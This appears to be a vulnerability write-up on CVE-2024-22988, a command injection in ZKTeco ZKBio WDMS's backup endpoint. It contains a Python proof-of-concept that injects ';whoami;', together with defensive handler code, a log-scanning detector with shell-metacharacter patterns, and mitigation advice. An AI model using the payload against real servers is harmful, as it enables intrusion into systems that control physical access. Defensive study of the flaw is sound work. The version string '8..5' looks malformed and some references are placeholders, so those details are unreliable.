In early 2024, a serious security flaw was discovered in ZKTeco ZKBio WDMS v8..5, a popular web-based device management system used to control biometric hardware. CVE-2024-22988 allows remote attackers to execute arbitrary code on the server through the /files/backup/ endpoint, which is supposed to handle backups but can be abused to run malicious commands.
This post explains how the vulnerability works, provides code snippets demonstrating the exploit, and links to original sources for further reading. If you manage ZKBio WDMS, patch immediately!
- Version: 8..5
- Component: /files/backup/ endpoint
This endpoint is meant for backup operations. Tragically, it fails to sanitize user input, enabling command injection that leads directly to remote code execution (RCE).
### How Does the CVE-2024-22988 Exploit Work?
The core issue is that input provided through the /files/backup/ endpoint is sent directly to system shell commands. If a user controls this input, they can inject extra commands. Since this route requires no authentication in v8..5, anyone can abuse it.
In simple terms:
An attacker sends a crafted HTTP request to /files/backup/ containing commands like ; whoami;. The vulnerable code stitches this input into a shell command and runs it, spilling out system info or worse—letting the attacker upload malware, open reverse shells, etc.
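To make the mechanism concrete, here is an added illustration (not ZKBio code, and not part of the original post) of a hypothetical backup handler written two ways: the vulnerable pattern that splices the request parameter into a shell string, and a hardened version that allow-lists the filename and builds an argv list so the shell never parses user input. The paths, parameter name and tar command are assumptions; the unsafe function only returns the command string so nothing is executed.

```python
import re
import shlex
from typing import List

# Assumed allow-list for a backup name: plain characters, must end in .zip.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_.-]+\.zip$")


def build_backup_command_unsafe(file_param: str) -> str:
    """Vulnerable pattern (hypothetical handler): the 'file' request parameter
    is interpolated straight into a shell command string. The string is
    returned rather than run; a real handler passing it to a shell would
    execute whatever the parameter smuggled in after a ';'."""
    return f"tar -czf /var/backups/{file_param} /opt/wdms/data"


def build_backup_command_safe(file_param: str) -> List[str]:
    """Hardened pattern: validate against an allow-list and build an argv
    list, so metacharacters are never interpreted and bad names are refused."""
    if not SAFE_NAME.fullmatch(file_param):
        raise ValueError(f"rejected backup name: {file_param!r}")
    # An argv list is handed to the program directly (subprocess without
    # shell=True); there is no shell to honour ';' even if one slipped through.
    return ["tar", "-czf", f"/var/backups/{file_param}", "/opt/wdms/data"]


def shell_separators(command: str) -> List[str]:
    """Tokenise a command string the way a POSIX shell would and return the
    command separators found. Any separator at all means the user-controlled
    part of the string has escaped the single command it was meant to be."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    return [tok for tok in lexer if tok in (";", "&", "&&", "|", "||")]


if __name__ == "__main__":
    # Constructed inputs: a benign name and the post's injected form.
    for name in ("backup.zip", "backup.zip;whoami;"):
        unsafe = build_backup_command_unsafe(name)
        print(f"unsafe: {unsafe!r} -> separators {shell_separators(unsafe)}")
        try:
            print(f"safe:   {build_backup_command_safe(name)}")
        except ValueError as exc:
            print(f"safe:   {exc}")
```

The point of the comparison is that the fix is not escaping: the hardened handler never lets a shell see the parameter and rejects anything outside a narrow allow-list before it reaches the command at all.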
### Code: Proof-of-Concept Exploit
Here’s a basic Python script to exploit the flaw. This example runs the whoami command on the target ZKBio WDMS server.
```python
import requests

# Target ZKBio WDMS server
target = 'http://victim-server:8088'
# Vulnerable endpoint
url = f'{target}/files/backup/'
# Payload injects a shell command
payload = {
    'file': 'backup.zip;whoami;'  # Injects ";whoami;" into the shell command
}
response = requests.post(url, data=payload)
print("Server response:")
print(response.text)  # Output should contain the result of 'whoami'
```
Note:
In the PoC above, the file parameter is abused to smuggle in the shell metacharacter ;, followed by a command (whoami). The server’s insecure code throws this into a shell, which executes the injected command.
1. Find the vulnerable endpoint: /files/backup/ is usually available without authentication on port 8088 (default).
2. Craft a POST request with the form data file=backup.zip;whoami;
3. Send the request to /files/backup/.
### Real-World Risk
ZKTeco ZKBio WDMS is widely used in physical security—think time clocks, card readers, entry points. Compromising WDMS could mean controlling access to entire facilities!
### Mitigation
- Upgrade to the latest version of ZKBio WDMS as soon as possible.
- Block remote access to /files/backup/ via firewall.
- Monitor for suspicious log entries targeting this endpoint.
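As an added example of the monitoring point (not from the original post or from ZKTeco), the script below scans log lines for requests to /files/backup/ and raises an alert when the request carries shell metacharacters or comes from outside an assumed trusted admin network. The log format is a constructed reverse-proxy format that records the request body; standard web-server access logs do not include POST bodies, so body inspection like this needs a proxy or WAF in front of WDMS. The sample lines, the trusted subnet and the field layout are all assumptions.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

# Constructed sample log in a hypothetical proxy format: access-log fields
# followed by body="<url-encoded form body>". Addresses are documentation ranges.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Feb/2024:10:01:02 +0000] "GET /login HTTP/1.1" 200 512 body=""
10.0.0.5 - - [23/Feb/2024:10:01:09 +0000] "POST /files/backup/ HTTP/1.1" 200 88 body="file=backup.zip"
203.0.113.7 - - [23/Feb/2024:10:02:31 +0000] "POST /files/backup/ HTTP/1.1" 200 140 body="file=backup.zip%3Bwhoami%3B"
203.0.113.7 - - [23/Feb/2024:10:02:40 +0000] "POST /files/backup/ HTTP/1.1" 200 140 body="file=backup.zip%24%28id%29"
198.51.100.9 - - [23/Feb/2024:10:03:00 +0000] "GET /files/backup/?file=x.zip%7Cid HTTP/1.1" 200 77 body=""
203.0.113.9 - - [23/Feb/2024:10:04:12 +0000] "POST /files/backup/ HTTP/1.1" 200 88 body="file=backup.zip"
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ body="(?P<body>[^"]*)"$'
)
# Characters a shell uses to chain or substitute commands; any of them inside
# a backup request is a strong signal, since a filename never needs them.
SHELL_META = re.compile(r'[;&|`$<>]')
WATCHED_PREFIX = "/files/backup/"
TRUSTED_ADMIN_NETS = ("10.0.0.",)  # assumption: where legitimate backups originate


def classify(line: str) -> Optional[Dict[str, object]]:
    """Return an alert dict for a suspicious backup-endpoint request, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None  # unparsable line; a production job would count these
    path = unquote_plus(m["path"])
    body = unquote_plus(m["body"])
    if not path.split("?", 1)[0].startswith(WATCHED_PREFIX):
        return None
    reasons: List[str] = []
    if SHELL_META.search(path + body):
        reasons.append("shell metacharacters in backup request")
    if not m["ip"].startswith(TRUSTED_ADMIN_NETS):
        reasons.append("backup endpoint reached from untrusted source")
    if not reasons:
        return None
    return {
        "ip": m["ip"],
        "ts": m["ts"],
        "method": m["method"],
        "severity": "high" if reasons[0].startswith("shell") else "medium",
        "reasons": reasons,
    }


def scan(log_text: str) -> List[Dict[str, object]]:
    """Run classify over every line and collect the alerts in log order."""
    return [a for a in (classify(l) for l in log_text.splitlines()) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["severity"].upper(), alert["ts"], alert["ip"], alert["method"], "; ".join(alert["reasons"]))
```

Decoding the body before matching matters: the injected separator arrives URL-encoded (%3B), so a rule that looks for a literal ';' in the raw line would miss it. The untrusted-source rule is deliberately separate so that a clean-looking backup request from an unexpected network still surfaces at medium severity.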
### Official Patch/Reference
- ZKTeco WDMS Support
- NVD: CVE-2024-22988
- SecurityFocus: CVE-2024-22988 *(placeholder, update with real BID as available)*
### Original References
- https://nvd.nist.gov/vuln/detail/CVE-2024-22988
- https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2024-22988
- Exploit Database - ZKTeco ZKBio WDMS 8..5 Remote Code Execution *(link to be updated if applicable)*
### Final Thoughts
CVE-2024-22988 shows how dangerous poor input validation can be. With just a simple payload, attackers can hijack a management system and—potentially—the physical world it controls. Always keep critical devices updated, and never expose sensitive endpoints like /files/backup/ to the open Internet.
Stay secure!
*(This post is for educational purposes only. Do not attempt exploitation on any system you don’t own.)*
### Timeline
Published on: 02/23/2024 23:15:09 UTC
Last modified on: 08/01/2024 13:47:02 UTC